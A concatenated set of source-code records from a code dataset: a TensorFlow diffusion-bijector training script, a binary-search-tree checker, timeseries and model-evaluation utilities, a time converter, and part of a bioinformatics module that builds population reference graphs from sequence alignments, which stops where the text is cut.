keras.Input(shape=(2,))\nxl = keras.layers.Dense(64, activation=\"relu\")(density_inputs)\nxl = keras.layers.Dense(32, activation=\"sigmoid\")(xl)\nxl = keras.layers.Dense(64, activation=\"sigmoid\")(xl)\ndensity_outputs = keras.layers.Dense(1, activation=\"linear\")(xl)\nmodel = keras.Model(density_inputs, density_outputs, name=\"density\")\nmodel.compile(optimizer=\"Adam\", loss=\"mse\")\n\noptimizer = tf.keras.optimizers.Adam(learning_rate=0.0001)\nloss_tracker = keras.metrics.Mean(name=\"loss\")\n\nmix = 0.3\nbimix_gauss = tfd.Mixture(\n cat=tfd.Categorical(probs=[mix, 1.0 - mix]),\n components=[\n tfd.Normal(loc=-1.0, scale=0.5),\n tfd.Normal(loc=+1.0, scale=0.5),\n ],\n)\n\nnormal = tfp.distributions.Normal(\n 0.0, 5.0, validate_args=False, allow_nan_stats=True, name=\"Normal\"\n)\n\n\n@tf.function\ndef reconstruction(prev_x, next_y):\n mae_loss = tf.reduce_mean(tf.math.abs(prev_x - next_y))\n return mae_loss\n\n\n@tf.function\ndef kolmogorov(point, mu, sigma):\n x = point[:, 0]\n t = point[:, 1]\n with tf.GradientTape(persistent=True) as tape2:\n tape2.watch(point)\n\n with tf.GradientTape(persistent=True) as tape1:\n tape1.watch(point)\n f = model(point, training=True)\n df_dxt = tape1.gradient(f, point)\n d2f_dxt2 = tape1.gradient(df_dxt, point)\n\n # forward kolmogorov\n # df_dt = - mu * df_dx + 0.5 * sig^2 * d2f_dx2\n klm_loss = tf.reduce_sum(\n tf.math.abs(\n df_dxt[:, 1]\n + mu(x, t) * df_dxt[:, 0]\n - 0.5 * tf.math.square(sigma(x, t)) * d2f_dxt2[:, 0]\n )\n )\n return klm_loss\n\n\n# @tf.function\ndef train_step(bijector, paths, mu, sigma):\n x0 = bimix_gauss.sample(paths)\n xt = bijector._forward(x0)\n\n with tf.GradientTape(persistent=True) as tape:\n x0_bar = bijector._inverse(xt.numpy()) # <- breaks if you pass tensors\n\n prev_x = bijector.bijectors[0].prev_x\n next_y = bijector.bijectors[0].next_y\n time = bijector.bijectors[0].time\n point = bijector.bijectors[0].point\n\n mae_loss = reconstruction(prev_x, next_y)\n klm_loss = kolmogorov(point, mu, sigma)\n loss = mae_loss + klm_loss\n\n if (len(bijector.bijectors) % 100 == 0):\n print(\"time: {:.2f} - loss: {:.2f}\".format(time, loss.numpy()))\n\n grads = tape.gradient(loss, model.trainable_weights)\n optimizer.apply_gradients(zip(grads, model.trainable_weights))\n return loss\n\n\ndef main():\n\n mu = lambda x, t: 0.0\n sigma = lambda x, t: 1.5\n paths = 1000\n tmin = 0.0\n tmax = 5.0\n dt = 0.01\n steps = int((tmax - tmin) / dt)\n t = tf.linspace(tmin, tmax, int(steps + 1))\n\n epochs = 100\n for epoch in range(epochs):\n start_time = time.time()\n\n bijectors = []\n\n for ti in t[1:]:\n bijectors.append(\n ConditionedDiffusionBijector(\n mu,\n sigma,\n ti,\n dt,\n paths,\n model,\n )\n )\n\n bijector = tfb.Chain(list(reversed(bijectors)))\n loss_value = train_step(bijector, paths, mu, sigma)\n\n loss_tracker.update_state(loss_value)\n train_acc = loss_tracker.result()\n elapsed = time.time() - start_time\n loss_tracker.reset_states()\n\n print(\n \"\\nEpoch: {} - Elapsed: {:.2f} seconds - Loss: {:.2f}\\n\".format(epoch, elapsed, train_acc)\n )\n\n x0 = bimix_gauss.sample(paths)\n xt = bijector._forward(x0)\n x0_bar = bijector._inverse(xt.numpy())\n plt.hist(x0.numpy(), 100, alpha=0.5, label=\"x0\")\n plt.hist(xt.numpy(), 100, alpha=0.5, label=\"xt\")\n plt.hist(x0_bar.numpy(), 100, alpha=0.5, label=\"x0_bar\")\n plt.legend(loc=\"upper right\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"diffusion-vae.py","file_name":"diffusion-vae.py","file_ext":"py","file_size_in_byte":6460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"45344805","text":"\"\"\"\nGiven a binary tree. Check whether it is a BST or not.\n\nExample 1:\n\nInput:\n 2\n / \\\n1 3\nOutput: 1\n\nProblem link :- \nhttps://practice.geeksforgeeks.org/problems/check-for-bst/1/?company[]=Amazon&problemStatus=solved&problemType=functional&page=1&sortBy=submissions&query=company[]AmazonproblemStatussolvedproblemTypefunctionalpage1sortBysubmissions\n\n\"\"\"\n\n\nINT_MAX = 4294967296\nINT_MIN = -4294967296\n\nfrom collections import deque\n# Tree Node\nclass Node:\n def __init__(self, val):\n self.right = None\n self.data = val\n self.left = None\n\n# Function to Build Tree \ndef buildTree(s):\n #Corner Case\n if(len(s)==0 or s[0]==\"N\"): \n return None\n \n # Creating list of strings from input \n # string after spliting by space\n ip=list(map(str,s.split()))\n \n # Create the root of the tree\n root=Node(int(ip[0])) \n size=0\n q=deque()\n \n # Push the root to the queue\n q.append(root) \n size=size+1 \n \n # Starting from the second element\n i=1 \n while(size>0 and i=len(ip)):\n break\n currVal=ip[i]\n \n # If the right child is not null\n if(currVal!=\"N\"):\n \n # Create the right child for the current node\n currNode.right=Node(int(currVal))\n \n # Push it to the queue\n q.append(currNode.right)\n size=size+1\n i=i+1\n return root\n\n\ndef isBST(node):\n return checkBST(node,INT_MIN,INT_MAX)\n\ndef checkBST(node,mini,maxi):\n if node==None:\n return 1\n else:\n if node.data<=mini or node.data>=maxi:\n return 0\n else:\n return (checkBST(node.left,mini,node.data) and checkBST(node.right,node.data,maxi))\n \n \nif __name__==\"__main__\":\n t=int(input())\n for _ in range(0,t):\n s=input()\n root=buildTree(s)\n if isBST(root):\n print(1) \n else:\n print(0)\n","sub_path":"GeeksforGeeks/check_for_bst.py","file_name":"check_for_bst.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"242934119","text":"import os, sys\nimport pandas as pd, numpy as np\n\n\n#############################################################################################\n##################### CREATE SYNTHETIC TIMESERIES############################################\ndef create_timeseries1d(start_date = '1/1/2000' ,end_date = None ,periods = 1000, freq = 'D' ,weight = 1 , fun=None ):\n \n date_rng = pd.date_range(start=start_date, end=end_date, freq='D',periods=periods)\n df = pd.DataFrame(date_rng, columns=['date'])\n data =[]\n for index in range(0,len(df)):\n data.append(fun(index)) \n df['data'] = data\n df['datetime'] = pd.to_datetime(df['date'])\n df = df.set_index('datetime')\n df.drop(['date'], axis=1, inplace=True)\n return df\n\n\ndef create_timeseries_2d(start_date = '1/1/2000' ,end_date = None ,periods = 660, freq = 'D' ,weight = 1 , fun=None ):\n pass\n \n \n \ndef create_timeseries_kd(start_date = '1/1/2000' ,end_date = None ,periods = 660, freq = 'D' ,weight = 1 , params=None ):\n date_rng = pd.date_range(start=start_date, end=end_date, freq='D',periods=periods)\n df = pd.DataFrame(date_rng, columns=['date'])\n data =[]\n Ncols = len(params)\n for key in params:\n data = [] \n fun = params[key]\n for index in range(0,len(df)):\n data.append(fun(index)) \n df[key] = data\n df['datetime'] = pd.to_datetime(df['date'])\n df = df.set_index('datetime')\n df.drop(['date'], axis=1, inplace=True)\n return df\n ### k dumsnio\n\n \n \n \n\ndef model_eval(clf0, df, colX, coly=\"y\", test_size=0.5, istrain=1, use_eval=0 ) :\n clf = copy.deepcopy(clf0) \n yy = df[coly].values\n X = df[colX].values \n X = X.reshape(-1,1) if len(colX) == 1 else X\n print(\"X\", X.shape )\n\n if istrain : \n X_train, X_test, y_train, y_test = train_test_split( X, yy, test_size=test_size, \n random_state=42)\n del X, yy\n gc.collect()\n if use_eval : \n try :\n clf.fit(X_train, y_train , eval_set= (X_test0, y_test0) )\n except :\n print(\"Using local\", flush=True) \n clf.fit(X_train, y_train , eval_set= (X_test, y_test) ) \n \n else :\n clf.fit(X_train, y_train )\n\n\n ytest_proba = clf.predict_proba(X_test)[:, 1]\n ytest_pred = clf.predict(X_test)\n sk_showmetrics(y_test, ytest_pred, ytest_proba)\n return clf\n\n else :\n y_proba = clf.predict_proba(X)[:, 1]\n y_pred = clf.predict(X)\n sk_showmetrics(yy, y_pred, y_proba)\n\n\n\n\n\ndef model_fit(df2, cols_train, col_target = \"y\", save_suffix=\"area_gms_201909\",\n modelname= \"RandomForestClassifier\", dosave=1 , coldate=\"dateint\", test_size=0.9,\n coldate_limit = 201801, dfeval=None,\n dirmodel =\"\",\n **kw) :\n #cols_train = [ 'ALL_ROOM', 'travel_gms_total_1yr', 'travel_gms_total_6mth',\n # 'travel_gms_total_1mth', 'travel_cnt_total_1yr',\n # 'travel_cnt_total_6mth', 'gms_6mth_diff', 'gms_1yr_diff', ]\n # col_target = \"y\"\n print( df2[ cols_train ].head(3) )\n print( \"coltarget\", sum(df2[ col_target] ) )\n imax =len(df2)\n\n\n ########### Train ############################################################\n clf, use_eval = model_get(name= modelname, **kw)\n #cols_train = RandomForestClassifier(max_depth= kw[\"max_depth\"], n_estimators= kw[\"n_estimators\"],\n # class_weight=\"balanced\" ) # random_state=0,\n\n clf = model_eval( clf, df2,\n colX = cols_train, coly= col_target, test_size=test_size, istrain = 1,\n use_eval= use_eval )\n\n clf_features = feature_impt_rf(clf , cols_train)\n \n\n ########### Prediction Check ##############################################\n if dfeval is not None :\n print(\"Using Eval\") \n else : \n dfeval = df2\n print(\"using Full\")\n \n dfeval[ col_target + \"pred\" ] = clf.predict( dfeval[cols_train].values )\n dfeval[ col_target + \"pred_proba\"] = clf.predict_proba( dfeval[cols_train].values )[:,1]\n\n dfstat = metric_accuracy_check(dfeval, col_target= col_target, ypred = col_target + \"pred\",\n ypred_proba = col_target + \"pred_proba\", coldate = coldate )\n print(dfstat)\n \n if dosave :\n ########### Export Model ##################################################\n dirmodel2 = dirmodel + \"/\" +save_suffix +\"/\"\n os.makedirs( dirmodel2, exist_ok=True )\n save_model(clf, cols_train, df2, dirmodel2 , f\"clf\" )\n # df2.to_csv( dirmodel + f\"/travel_{save_suffix}_.csv\")\n dfstat.to_csv( dirmodel2 + f\"/clf_stats.csv\")\n save_session(folder= dirsession + f\"/{save_suffix}_train\" , glob=globals() )\n\n return clf, dfstat, clf_features\n\n\n\n\n\"\"\"\nclf = clf_h\ncols_train = cols_h_train\n\n\n\n\n\n####################################################################################################\n############ Train h #########################################################################\ndf = df[ -df.n_user.isnull( )]\ndf = df[ -df.travel_gms_total_3mth.isnull( )]\ndf = df[ -df.travel_gms_total_6mth.isnull( )]\ndf = df[ -df.travel_gms_total_1mth_area_log_area.isnull() ]\n\n\n\n\n\ncols_h = list( df.columns)\ncols_h_train = col_remove(cols_h, [ \"date\", \"y\", \"zip3\", \"shi_int\", 'travel_gms_total_3yr_h_log',\n 'travel_cnt_total_3yr_h_log',\n \n 'y2', 'y3', 'dateint', 'ypred_area', 'zipcode', 'C_TIKU_ID', 'y2',\n 'travel_cnt_total_3yr', 'travel_gms_total_1yr_total', \n 'C_TIKU_ID', 'h_name',\n 'zipcode',\n 'cat1', 'area_name', 'ken', 'shi', 'size', 'cat2',\n 'h_gms_score', 'amt_sum', 'amt_max', 'year', 'h_id',\n \n 'gms_3yr_diff', 'cnt_3yr_diff', 'gms_3yr_diff_area',\n 'travel_gms_total_3yr',\n \n \n \n 'travel_cnt_total_3yr_area_log_area', 'travel_gms_total_3yr_area_log_area',\n 'travel_cnt_total_3yr_log', 'travel_gms_total_3yr_log',\n 'gms_6mth_yoy', 'ken_int_area',\n 'shi_int_area', 'ypred',\n 'gms_1yr_yoy',\n 'gms_3mth_yoy'\n \n ] )\nprint(len( cols_h_train))\n \ncol_target = 'y'\n\ndatec = 201801\ndatemin = 201706\ndatemax = 201905\n\n\n\n#### Check\nfor x in cols_h_train :\n print(x, df[ (df.date >= datemin ) & (df.date < datemax ) ][x].isnull().sum() )\ndf[ (df.date >= datemin ) & (df.date < datemax ) ]['y'].hist()\n\n\n\n\n\n\n###### Details\nii = 0\ndirmodel = \"C:/Users/kevin.noel/Box/Data Science Department/Personal/znono/a/model/h/\"\ndirsession = dirmodel + \"/session/\"\n\n\n#### Eval Dataset \nX_test0 = df[ (df.date >= datec ) & (df.date < datemax ) ][ cols_h_train].values\ny_test0 = df[ (df.date >= datec ) & (df.date < datemax ) ][ col_target].values\nprint(X_test0.shape)\n\n\n\ndfeval = None\n\n\nii = ii + 1\nclf_h, dfstat_h,clf_features_h = model_fit( df[ (df.date >= datemin) & (df.date <= datemax ) ], \n cols_train = cols_h_train, col_target = \"y\",\n coldate = 'date',\n # dfeval = df[ (df.date > 201806) & (df.date < 201905 ) ],\n \n save_suffix = \"area_gms_202004_OK_v\"+ str(ii) , \n dirmodel = dirmodel ,\n \n dosave = 1 ,\n test_size = 0.40,\n\n modelname = \"LGBMClassifier\",\n \n num_leaves= 300, \n max_depth=40, \n \n learning_rate=0.01, \n num_iterations= 200,\n max_bin = 800, \n\n n_estimators= 300,\n boosting_type='gbdt', \n \n bagging_fraction=0.3,\n \n subsample_for_bin=200000, objective=\"binary\",\n class_weight=\"balanced\", min_split_gain=0.0, min_child_weight=0.001,\n min_child_samples=5, subsample=1.0, subsample_freq=0,\n colsample_bytree=1.0, reg_alpha=0.0, reg_lambda=0.0,\n n_jobs=-1, silent=False, importance_type='split' )\n\n\n\n\n##### Evaluation Over a period :\ndf[\"ypred\"] = clf_h.predict( df[ cols_h_train ].values )\ndf[\"ypred_proba\"] = clf_h.predict_proba( df[ cols_h_train ] )[:,1]\n\n\ndfeval2 = df[ (df.date >= datec ) & (df.date < datemax ) ]\ndfstat = metric_accuracy_check(dfeval2, col_target= col_target, ypred = col_target + \"pred\",\n ypred_proba = col_target + \"pred_proba\", coldate = 'date' )\n\n\ndfstat.to_csv( dirmodel + f\"/clf_stats.csv\" )\n\n\n\n\n#####################################\ngluonts_model_eval( clf_h, df[ (df.date >= datec ) & (df.date < datemax ) ],\n colX = cols_h_train, coly= col_target, test_size=0.99, istrain = 0,\n use_eval= 1 )\n\n\nprint(len(df[ (df.date >= datec ) ]))\ndf.groupby('date').agg({ 'h_id' : 'count' })\ndf.columns\n\n\n\"\"\"\n\n","sub_path":"data/input/tseries_m5/util_eval.py","file_name":"util_eval.py","file_ext":"py","file_size_in_byte":9072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"115181859","text":"#!/usr/bin/env python3\n\ndef to_seconds(hours, minutes, seconds):\n return hours*3600+minutes*60+seconds\n\nprint('Welcome to the time converter')\n\ncont = 'y'\nwhile (cont.lower() == 'y'):\n hours = int(input('Number of hours: '))\n minutes = int(input('Number of minutes: '))\n seconds = int(input('Number of seconds: '))\n\n print('That is {} seconds'.format(to_seconds(hours, minutes, seconds)))\n print()\n cont = input('Do you want to do more conversions? [y to continue]')\n\nprint('Bye')\n","sub_path":"python_interacting_with_os/week_four/to_seconds.py","file_name":"to_seconds.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"243255509","text":"import gzip\nimport logging\nimport os\n\nimport numpy as np\nfrom Bio import AlignIO\nfrom Bio.AlignIO import MultipleSeqAlignment\nfrom sklearn.cluster import KMeans\n\nfrom make_prg.utils import remove_duplicates, remove_gaps\n\n\ndef get_interval_seqs(interval_alignment):\n \"\"\"Replace - with nothing, remove seqs containing N or other non-allowed letters\n and duplicate sequences containing RYKMSW, replacing with AGCT alternatives \"\"\"\n allowed_bases = {\"A\", \"C\", \"G\", \"T\", \"R\", \"Y\", \"K\", \"M\", \"S\", \"W\"}\n iupac = {\n \"R\": [\"G\", \"A\"],\n \"Y\": [\"T\", \"C\"],\n \"K\": [\"G\", \"T\"],\n \"M\": [\"A\", \"C\"],\n \"S\": [\"G\", \"C\"],\n \"W\": [\"A\", \"T\"],\n }\n seqs = []\n gapless_seqs = [\n remove_gaps(str(record.seq)).upper() for record in interval_alignment\n ]\n unique_seqs = remove_duplicates(gapless_seqs)\n\n for seq in unique_seqs:\n if allowed_bases.issuperset(seq):\n new_seqs = [seq]\n for letter in iupac.keys():\n letter_seqs = []\n for t in new_seqs:\n if letter in t:\n letter_seqs.append(t.replace(letter, iupac[letter][0]))\n letter_seqs.append(t.replace(letter, iupac[letter][1]))\n else:\n letter_seqs.append(t)\n new_seqs = letter_seqs\n seqs.extend(new_seqs)\n ret_list = list(set(seqs))\n if len(ret_list) == 0:\n logging.warning(\n \"WARNING: Every sequence must have contained an N in this slice - redo sequence curation because this is nonsense\"\n )\n logging.warning(\n \"Sequences were\",\n \" \".join(\n list(\n remove_duplicates(\n [\n remove_gaps(str(record.seq)).upper()\n for record in interval_alignment\n ]\n )\n )\n ),\n )\n logging.warning(\n \"Using these sequences anyway, and should be ignored downstream\"\n )\n seqs = list(\n remove_duplicates(\n [remove_gaps(str(record.seq)).upper() for record in interval_alignment]\n )\n )\n return sorted(list(set(seqs)))\n\n\nclass AlignedSeq(object):\n \"\"\"\n Object based on a set of aligned sequences. Note min_match_length must be strictly greater than max_nesting + 1.\n \"\"\"\n\n def __init__(\n self,\n msa_file,\n alignment_format=\"fasta\",\n max_nesting=2,\n nesting_level=1,\n min_match_length=3,\n site=5,\n alignment=None,\n interval=None,\n prg_file=None,\n ):\n self.msa_file = msa_file\n self.alignment_format = alignment_format\n self.max_nesting = max_nesting\n self.nesting_level = nesting_level\n self.min_match_length = min_match_length\n self.site = site\n self.alignment = alignment\n if not self.alignment:\n logging.info(\"Read from MSA file %s\", self.msa_file)\n if \".gz\" in self.msa_file:\n logging.debug(\"MSA is gzipped\")\n handle = gzip.open(self.msa_file, \"rt\")\n self.alignment = AlignIO.read(handle, self.alignment_format)\n handle.close()\n else:\n self.alignment = AlignIO.read(self.msa_file, self.alignment_format)\n self.interval = interval\n self.num_seqs = len(self.alignment)\n self.consensus = self.get_consensus()\n self.length = len(self.consensus)\n (self.match_intervals, self.non_match_intervals) = self.get_match_intervals\n self.check_nonmatch_intervals()\n self.all_intervals = self.match_intervals + self.non_match_intervals\n logging.info(\"Non match intervals: %s\", self.non_match_intervals)\n self.all_intervals.sort()\n if self.nesting_level == 1:\n self.length_match_intervals = 0\n for interval in self.match_intervals:\n self.length_match_intervals += interval[1] - interval[0] + 1\n self.prop_in_match_intervals = self.length_match_intervals / float(\n self.length\n )\n\n # properties for stats\n self.subAlignedSeqs = {}\n\n # make prg\n self.delim_char = \" \"\n self.prg = \"\"\n if prg_file:\n logging.info(\n \"Reading from a PRG file which already exists. To regenerate, delete it.\"\n )\n with open(prg_file, \"r\") as f:\n self.prg = f.read()\n else:\n self.prg = self.get_prg()\n self.kmer_dict = {}\n\n def get_consensus(self):\n \"\"\"Given a set of aligment records from AlignIO, creates\n a consensus string.\n Lower and upper case are equivalent\n Non AGCT symbols RYKMSW result in non-consensus and are substituted in graph\n N results in consensus at that position unless they are all N.\"\"\"\n first_string = str(self.alignment[0].seq)\n consensus_string = \"\"\n for i, letter in enumerate(first_string):\n consensus = True\n for record in self.alignment:\n if (record.seq[i].upper() != \"N\" and letter.upper() != \"N\") and (\n record.seq[i].upper() != letter.upper()\n or record.seq[i].upper() in [\"R\", \"Y\", \"K\", \"M\", \"S\", \"W\"]\n ):\n consensus = False\n break\n if letter.upper() == \"N\" and record.seq[i].upper() != \"N\":\n letter = record.seq[i].upper()\n if consensus and letter.upper() != \"N\":\n consensus_string += letter\n else:\n consensus_string += \"*\"\n assert len(first_string) == len(consensus_string)\n return consensus_string\n\n @property\n def get_match_intervals(self):\n \"\"\"Return a list of intervals in which we have\n consensus sequence longer than min_match_length, and\n a list of the non-match intervals left.\"\"\"\n match_intervals = []\n non_match_intervals = []\n match_count = 0\n match_start = 0\n non_match_start = 0\n\n logging.debug(\"consensus: %s\" % self.consensus)\n if len(remove_gaps(self.consensus)) < self.min_match_length:\n # It makes no sense to classify a fully consensus sequence as\n # a non-match just because it is too short.\n if \"*\" in self.consensus:\n interval_alignment = self.alignment[:, 0 : self.length]\n interval_seqs = get_interval_seqs(interval_alignment)\n if len(interval_seqs) > 1:\n logging.debug(\n \"add short non-match whole interval [%d,%d]\"\n % (0, self.length - 1)\n )\n non_match_intervals.append([0, self.length - 1])\n else:\n logging.debug(\n \"add short match whole interval [%d,%d]\" % (0, self.length - 1)\n )\n match_intervals.append([0, self.length - 1])\n else:\n match_intervals.append([0, self.length - 1])\n logging.debug(\n \"add short match whole interval [%d,%d]\" % (0, self.length - 1)\n )\n else:\n for i in range(self.length):\n letter = self.consensus[i]\n if letter != \"*\":\n # In a match region.\n if match_count == 0:\n match_start = i\n match_count += 1\n elif match_count > 0:\n # Have reached a non-match. Check if previous match string is long enough to add to match_regions\n match_string = remove_gaps(\n self.consensus[match_start : match_start + match_count]\n )\n match_len = len(match_string)\n logging.debug(\"have match string %s\" % match_string)\n\n if match_len >= self.min_match_length:\n # if the non_match sequences in the interval are really the same, add a match interval\n interval_alignment = self.alignment[\n :, non_match_start : match_start + 1\n ]\n interval_seqs = get_interval_seqs(interval_alignment)\n if non_match_start < match_start and len(interval_seqs) > 1:\n non_match_intervals.append(\n [non_match_start, match_start - 1]\n )\n logging.debug(\n \"add non-match interval as have alts [%d,%d]\"\n % (non_match_start, match_start - 1)\n )\n elif non_match_start < match_start:\n match_intervals.append([non_match_start, match_start - 1])\n logging.debug(\n \"add match interval as only one seq [%d,%d]\"\n % (non_match_start, match_start - 1)\n )\n match_intervals.append(\n [match_start, match_start + match_count - 1]\n )\n logging.debug(\n \"add match interval to complete step [%d,%d]\"\n % (match_start, match_start + match_count - 1)\n )\n non_match_start = i\n match_count = 0\n match_start = non_match_start\n\n # At end add last intervals\n match_string = remove_gaps(\n self.consensus[match_start : match_start + match_count]\n )\n match_len = len(match_string)\n logging.debug(\"at end have match string %s\" % match_string)\n if 0 < match_len < self.min_match_length:\n logging.debug(\n \"have short match region at end, so include it in non-match-region before - \"\n \"match count was %d\" % match_count\n )\n match_count = 0\n match_start = non_match_start\n logging.debug(\"match count is now %d\" % match_count)\n\n if match_count > 0:\n interval_alignment = self.alignment[\n :, non_match_start : match_start + 1\n ]\n else:\n interval_alignment = self.alignment[:, non_match_start : self.length]\n interval_seqs = get_interval_seqs(interval_alignment)\n if len(interval_seqs) == 1:\n match_intervals.append([non_match_start, self.length - 1])\n logging.debug(\n \"add match interval at end as only one seq [%d,%d]\"\n % (non_match_start, self.length - 1)\n )\n elif len(interval_seqs) > 1 and non_match_start < match_start:\n non_match_intervals.append([non_match_start, match_start - 1])\n logging.debug(\n \"add non-match interval at end as have alts [%d,%d]\"\n % (non_match_start, match_start - 1)\n )\n match_intervals.append([match_start, self.length - 1])\n logging.debug(\n \"add match interval at end [%d,%d]\" % (match_start, self.length - 1)\n )\n else:\n non_match_intervals.append([non_match_start, self.length - 1])\n logging.debug(\n \"add only non-match interval at end as have alts [%d,%d]\"\n % (non_match_start, self.length - 1)\n )\n\n # check all stretches of consensus are in an interval, and intervals don't overlap\n for i in range(self.length):\n count_match = 0\n for interval in match_intervals:\n if interval[0] <= i <= interval[1]:\n count_match += 1\n count_non_match = 0\n for interval in non_match_intervals:\n if interval[0] <= i <= interval[1]:\n count_non_match += 1\n\n assert count_match | count_non_match, (\n \"Failed to correctly identify match intervals: position %d \"\n \"appeared in both/neither match and non-match intervals\" % i\n )\n assert count_match + count_non_match == 1, (\n \"Failed to correctly identify match intervals: position \"\n \"%d appeared in %d intervals\" % (i, count_match + count_non_match)\n )\n\n return match_intervals, non_match_intervals\n\n def check_nonmatch_intervals(self):\n \"\"\"Goes through non-match intervals and makes sure there is more than one sequence there, else makes it a match\n interval.\"\"\"\n for i in reversed(range(len(self.non_match_intervals))):\n interval = self.non_match_intervals[i]\n interval_alignment = self.alignment[:, interval[0] : interval[1] + 1]\n interval_seqs = get_interval_seqs(interval_alignment)\n if len(interval_seqs) < 2:\n self.match_intervals.append(self.non_match_intervals[i])\n self.non_match_intervals.pop(i)\n self.match_intervals.sort()\n\n def kmeans_cluster_seqs_in_interval(\n self, interval\n ): # , kmer_size=self.min_match_length):\n \"\"\"Divide sequences in interval into subgroups of similar\n sequences. Return a list of lists of ids.\"\"\"\n if interval[1] - interval[0] <= self.min_match_length:\n logging.info(\"Small variation site in interval %s \\n\", interval)\n logging.debug(\n \"interval[1] - interval[0] <= self.min_match_length: %d <= %d\",\n interval[1] - interval[0],\n self.min_match_length,\n )\n interval_alignment = self.alignment[:, interval[0] : interval[1] + 1]\n interval_seqs = get_interval_seqs(interval_alignment)\n assert len(interval_seqs) == len(\n list(remove_duplicates(interval_seqs))\n ), \"should not have duplicate alternative allele sequences\"\n return_id_lists = [\n [\n record.id\n for record in self.alignment\n if remove_gaps(str(record.seq[interval[0] : interval[1] + 1]))\n == seq\n ]\n for seq in interval_seqs\n ]\n else:\n logging.debug(\n \"Get kmeans partition of interval [%d, %d]\", interval[0], interval[1]\n )\n interval_alignment = self.alignment[:, interval[0] : interval[1] + 1]\n interval_seq_dict = {}\n small_interval_seq_dict = {}\n seq_dict_keys = []\n\n for record in interval_alignment:\n seq = remove_gaps(str(record.seq))\n if seq in list(interval_seq_dict.keys()):\n interval_seq_dict[seq].append(record.id)\n elif seq in list(small_interval_seq_dict.keys()):\n small_interval_seq_dict[seq].append(record.id)\n elif len(seq) >= self.min_match_length:\n interval_seq_dict[seq] = [record.id]\n seq_dict_keys.append(seq)\n else:\n small_interval_seq_dict[seq] = [record.id]\n seq_dict_keys.append(seq)\n\n assert len(seq_dict_keys) == len(\n list(remove_duplicates(seq_dict_keys))\n ), \"error, have duplicate dictionary keys\"\n assert (\n len(\n [\n key\n for key in list(interval_seq_dict.keys())\n if key in list(small_interval_seq_dict.keys())\n ]\n )\n == 0\n ), \"error, should have no overlap of keys\"\n assert (\n len(\n [\n key\n for key in list(small_interval_seq_dict.keys())\n if key in list(interval_seq_dict.keys())\n ]\n )\n == 0\n ), \"error, should have no overlap of keys\"\n\n logging.debug(\n \"Add classes corresponding to %d small sequences\"\n % len(list(small_interval_seq_dict.keys()))\n )\n\n logging.debug(\n \"Now add classes corresponding to %d longer sequences\"\n % len(list(interval_seq_dict.keys()))\n )\n interval_seqs = list(interval_seq_dict.keys())\n big_return_id_lists = []\n if len(interval_seqs) > 1:\n # first transform sequences into kmer occurance vectors using a dict\n logging.debug(\"First transform sequences into kmer occurance vectors\")\n\n # make dict based on number of kmers in all sequences\n self.kmer_dict = {}\n n = 0\n for j, seq in enumerate(interval_seqs):\n for i in range(len(seq) - self.min_match_length + 1):\n if seq not in list(self.kmer_dict.keys()):\n self.kmer_dict[seq[i : i + self.min_match_length]] = n\n n += 1\n logging.debug(\"These vectors have length %d\" % n)\n\n # transform to vectors using dict\n seq_kmer_counts = np.zeros(shape=(len(interval_seqs), n))\n for j, seq in enumerate(interval_seqs):\n counts = np.zeros(n)\n for i in range(len(seq) - self.min_match_length + 1):\n counts[self.kmer_dict[seq[i : i + self.min_match_length]]] += 1\n seq_kmer_counts[j] = counts\n\n # cluster sequences using kmeans\n logging.debug(\"Now cluster:\")\n kmeans = KMeans(n_clusters=1, random_state=2).fit(seq_kmer_counts)\n pre_cluster_inertia = kmeans.inertia_\n\n if pre_cluster_inertia == 0:\n logging.debug(\"pre_cluster_intertia is 0!\")\n for key in list(interval_seq_dict.keys()):\n logging.debug(\n \"seq: %s, num_seqs with this seq: %d\",\n key,\n len(interval_seq_dict[key]),\n )\n\n cluster_inertia = pre_cluster_inertia\n number_of_clusters = 1\n logging.debug(\n \"number of clusters: %d, inertia: %f\",\n number_of_clusters,\n cluster_inertia,\n )\n while (\n cluster_inertia > 0\n and cluster_inertia > pre_cluster_inertia / 2\n and number_of_clusters <= len(interval_seqs)\n ):\n number_of_clusters += 1\n kmeans = KMeans(n_clusters=number_of_clusters, random_state=2).fit(\n seq_kmer_counts\n )\n cluster_inertia = kmeans.inertia_\n logging.debug(\n \"number of clusters: %d, inertia: %f\",\n number_of_clusters,\n cluster_inertia,\n )\n\n # now extract the equivalence class details from this partition and return\n logging.debug(\"Extract equivalence classes from this partition\")\n if pre_cluster_inertia > 0:\n equiv_class_ids = list(kmeans.predict(seq_kmer_counts))\n for i in range(max(equiv_class_ids) + 1):\n big_return_id_lists.append([])\n for i, val in enumerate(equiv_class_ids):\n big_return_id_lists[val].extend(\n interval_seq_dict[interval_seqs[i]]\n )\n else:\n logging.debug(\"default to not clustering\")\n big_return_id_lists = [\n interval_seq_dict[key] for key in interval_seq_dict.keys()\n ]\n elif len(interval_seqs) == 1:\n big_return_id_lists = [interval_seq_dict[interval_seqs[0]]]\n\n # now merge big and small return_id_lists so as to maintain the order of seqs before\n logging.debug(\"Merge return id lists for the partitions\")\n return_id_lists = []\n added_ids = []\n big_keys = list(interval_seq_dict.keys())\n small_keys = list(small_interval_seq_dict.keys())\n for seq in seq_dict_keys:\n if seq in small_keys:\n logging.debug(\n \"add (small) return ids: %s\" % small_interval_seq_dict[seq]\n )\n return_id_lists.append(small_interval_seq_dict[seq])\n elif seq in big_keys:\n not_added = [\n nid for nid in interval_seq_dict[seq] if nid not in added_ids\n ]\n if len(not_added) == len(interval_seq_dict[seq]):\n logging.debug(\n \"want to add (big) return ids: %s\" % interval_seq_dict[seq]\n )\n for i in range(len(big_return_id_lists)):\n if interval_seq_dict[seq][0] in big_return_id_lists[i]:\n logging.debug(\n \"add (big) return ids %d: %s\"\n % (i, big_return_id_lists[i])\n )\n return_id_lists.append(big_return_id_lists[i])\n added_ids.extend(return_id_lists[-1])\n break\n else:\n assert (\n len(not_added) == 0\n ), \"Equivalent sequences should be in same part of partition and are not\"\n else:\n logging.warning(\n \"Key %s doesn't seem to be in either big keys or small keys\"\n )\n assert len(interval_alignment) == sum(\n [len(i) for i in return_id_lists]\n ), \"I seem to have lost 